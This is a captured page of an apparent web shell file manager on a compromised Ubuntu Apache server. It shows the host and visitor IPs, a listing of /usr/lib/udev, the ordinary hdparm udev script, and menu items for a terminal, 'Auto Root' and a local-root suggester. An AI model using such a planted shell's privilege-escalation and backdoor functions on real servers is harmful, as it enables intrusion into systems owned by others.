Linux jobworks 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
Apache/2.4.58 (Ubuntu)
Server IP : 10.0.1.5 & Your IP : 216.73.216.61
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
udev /
Delete
Unzip
Name
Size
Permission
Date
Action
hwdb.d
[ DIR ]
drwxr-xr-x
2026-06-10 06:05
rules.d
[ DIR ]
drwxr-xr-x
2026-06-10 06:05
ata_id
82.72
KB
-rwxr-xr-x
2026-06-05 15:36
bcache-export-cached
1.13
KB
-rwxr-xr-x
2024-04-08 15:54
bcache-register
14.3
KB
-rwxr-xr-x
2024-04-08 15:54
cdrom_id
90.72
KB
-rwxr-xr-x
2026-06-05 15:36
dmi_memory_id
86.72
KB
-rwxr-xr-x
2026-06-05 15:36
fido_id
138.73
KB
-rwxr-xr-x
2026-06-05 15:36
hdparm
1.37
KB
-rwxr-xr-x
2025-08-05 17:14
hwdb.bin
11.73
MB
-r--r--r--
2026-06-10 06:05
iocost
150.85
KB
-rwxr-xr-x
2026-06-05 15:36
kpartx_id
2.33
KB
-rwxr-xr-x
2025-07-22 15:44
mtd_probe
34.57
KB
-rwxr-xr-x
2026-06-05 15:36
probe-bcache
14.3
KB
-rwxr-xr-x
2024-04-08 15:54
scsi_id
87.23
KB
-rwxr-xr-x
2026-06-05 15:36
snappy-app-dev
22.23
KB
-rwxr-xr-x
2026-07-13 14:38
usb_modeswitch
1.53
KB
-rwxr-xr-x
2025-08-05 17:14
v4l_id
38.57
KB
-rwxr-xr-x
2026-06-05 15:36
Save
Rename
#!/bin/sh set -e [ -n "$DEVNAME" ] || exit 1 . /lib/hdparm/hdparm-functions if [ -e /proc/cmdline ]; then #linux only - future proofing against BSD and Hurd :) if grep -wq nohdparm /proc/cmdline ; then exit 0 fi fi raidstat=OK if [ -e /proc/mdstat ]; then if egrep -iq "resync|repair|recover|check" /proc/mdstat; then raidstat=RESYNC fi elif [ -e /proc/rd/status ]; then raidstat=`cat /proc/rd/status` fi if ! [ "$raidstat" = 'OK' ]; then exit 1 fi die() { echo "$*" 1>&2 ; exit 1; } OPTIONS=$(hdparm_options $DEVNAME) || die "hdparm_options failed with: $OPTIONS" apmopts='' if [ -n "$OPTIONS" ]; then for opt in $OPTIONS; do case $opt in (*'-B'*|*'-S'*|*'force_spindown_time'*) apmopts='true' ;; esac done if [ "$apmopts" = true ]; then /usr/lib/pm-utils/power.d/95hdparm-apm resume fi # strip -S (spindown) and -B (apm), force_spindown_time and -q # apm options are handled by /usr/lib/pm-utils/power.d/95hdparm-apm OPTIONS=$(echo $OPTIONS | perl -pe 's/((-S|-B|force_spindown_time)[\d]{1,3})|(-q\s?)//g') if [ -n "$OPTIONS" ]; then /sbin/hdparm -q $OPTIONS $DEVNAME 2>/dev/null fi fi exit 0